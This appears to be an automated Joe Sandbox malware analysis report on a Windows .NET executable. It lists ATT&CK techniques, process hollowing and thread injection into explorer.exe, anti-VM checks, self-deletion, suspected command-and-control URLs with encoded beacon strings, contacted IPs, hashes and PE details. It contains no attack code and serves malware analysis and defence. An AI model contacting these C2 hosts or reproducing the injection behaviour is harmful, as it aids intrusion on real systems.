          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing23DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502315 Sample: divpCHa0h7.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 33 www.kangrungao.com 2->33 35 www.begukiu0.info 2->35 37 a.mb.cn 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 10 divpCHa0h7.exe 6 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\divpCHa0h7.exe.log, ASCII 10->31 dropped 63 Detected unpacking (changes PE section rights) 10->63 65 Tries to detect virtualization through RDTSC time measurements 10->65 14 divpCHa0h7.exe 10->14         started        17 divpCHa0h7.exe 10->17         started        19 divpCHa0h7.exe 10->19         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Maps a DLL or memory area into another process 14->69 71 Sample uses process hollowing technique 14->71 73 Queues an APC in another process (thread injection) 14->73 21 msdt.exe 14->21         started        24 explorer.exe 14->24 injected process9 dnsIp10 53 Self deletion via cmd delete 21->53 55 Modifies the context of a thread in another process (thread injection) 21->55 57 Maps a DLL or memory area into another process 21->57 59 Tries to detect virtualization through RDTSC time measurements 21->59 27 cmd.exe 1 21->27         started        39 www.sanlifalan.com 104.165.34.6, 49768, 80 EGIHOSTINGUS United States 24->39 41 websites076.homestead.com 108.167.135.122, 49789, 80 UNIFIEDLAYER-AS-1US United States 24->41 43 6 other IPs or domains 24->43 61 System process connects to network (likely due to code injection or exploit) 24->61 signatures11 process12 process13 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          divpCHa0h7.exe16%VirustotalBrowse
          divpCHa0h7.exe17%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.divpCHa0h7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.1.divpCHa0h7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.sanlifalan.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.jiyu-kobo.co.jp/CursJ0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cna-d0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cnl0%URL Reputationsafe
          http://www.founder.com.cn/cn/c0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y0zS0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/.0%URL Reputationsafe
          http://www.fonts.comn0%URL Reputationsafe
          http://www.founder.com.cn/cn_0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/a-e70%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.founder.com.cn/cnr-f0%Avira URL Cloudsafe
          www.esyscoloradosprings.com/fqiq/0%Avira URL Cloudsafe
          http://www.fontbureau.comasno0%Avira URL Cloudsafe
          http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Gras0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fonts.comX0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/o0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.sajatypeworks.coma-d0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/ri0%Avira URL Cloudsafe
          http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS0%Avira URL Cloudsafe
          http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr0%Avira URL Cloudsafe
          http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.sanlifalan.com
          		104.165.34.6
          		truetrueunknown
          floaterslaser.com
          		81.169.145.161
          		truefalse
            		high
            www.mambacustomboats.com
            		64.190.62.111
            		truefalse
              		high
              shops.myshopify.com
              		23.227.38.74
              		truefalse
                		high
                websites076.homestead.com
                		108.167.135.122
                		truefalse
                  		high
                  a.mb.cn
                  		8.212.24.67
                  		truefalse
                    		high
                    www.esyscoloradosprings.com
                    		unknown
                    		unknownfalse
                      		high
                      www.kangrungao.com
                      		unknown
                      		unknownfalse
                        		high
                        www.begukiu0.info
                        		unknown
                        		unknownfalse
                          		high
                          www.ribbonofficial.com
                          		unknown
                          		unknownfalse
                            		high
                            www.floaterslaser.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.floaterslaser.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+ltrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.esyscoloradosprings.com/fqiq/true
                              • Avira URL Cloud: safe
                              		low
                              http://www.sanlifalan.com/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzStrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzStrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ribbonofficial.com/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYrtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mambacustomboats.com/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzStrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.fontbureau.com/designersGdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/CursJdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/?divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bThedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cna-ddivpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.tiro.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.goodfont.co.krdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.collada.org/2005/11/COLLADASchema9DonedivpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comdivpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/cThedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnldivpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/cdivpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Y0zSdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/.divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fonts.comndivpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn_divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleasedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Y0divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/a-e7divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fonts.comdivpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krdivpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleasedivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cndivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnr-fdivpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.comdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comasnodivpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/GrasdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/jp/divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fonts.comXdivpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comldivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNdivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cndivpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmldivpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/tdivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/odivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sajatypeworks.coma-ddivpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/ridivpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpfalse
                                                  		high

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.165.34.6
                                                  		www.sanlifalan.comUnited States
                                                  		18779EGIHOSTINGUStrue
                                                  108.167.135.122
                                                  		websites076.homestead.comUnited States
                                                  		46606UNIFIEDLAYER-AS-1USfalse
                                                  23.227.38.74
                                                  		shops.myshopify.comCanada
                                                  		13335CLOUDFLARENETUSfalse
                                                  81.169.145.161
                                                  		floaterslaser.comGermany
                                                  		6724STRATOSTRATOAGDEfalse
                                                  64.190.62.111
                                                  		www.mambacustomboats.comUnited States
                                                  		11696NBS11696USfalse

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:502315
                                                  Start date:13.10.2021
                                                  Start time:19:45:01
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 55s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:divpCHa0h7.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:30
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@12/1@8/5
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 11% (good quality ratio 9.7%)
                                                  • Quality average: 72%
                                                  • Quality standard deviation: 32.6%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 84
                                                  • Number of non-executed functions: 103
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 95.100.218.79, 95.100.216.89, 2.20.178.33, 2.20.178.24, 40.112.88.60, 20.50.102.62
                                                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  19:46:07API Interceptor2x Sleep call for process: divpCHa0h7.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\divpCHa0h7.exe.log
                                                  Process:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1308
                                                  Entropy (8bit):5.348115897127242
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                  MD5:832D6A22CE7798D72609B9C21B4AF152
                                                  SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                                  SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                  SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.476049309864918
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:divpCHa0h7.exe
                                                  File size:477696
                                                  MD5:fda0d823b262ac2b1bd76a2053c29692
                                                  SHA1:73f72d7c987d44d1f236c138c5617b527c5ba340
                                                  SHA256:91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
                                                  SHA512:230e3a12c58a61c2348463b5acb92a6b557419b79e0427882750caa84d3c7e8fcec92ff6151f4f22b6eb967da138c931ed56f0dedadf1af1ac5d809508e74507
                                                  SSDEEP:12288:AsXSBAmUT9BbRsXFkN8xDqT2LWWJOxTa:AsCBAme9Bb2Xq8xk2LWx
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:c4b28ed696aa92c0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x45d612
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x6166C8DB [Wed Oct 13 11:54:03 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5d5c00x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x18ca4.rsrc
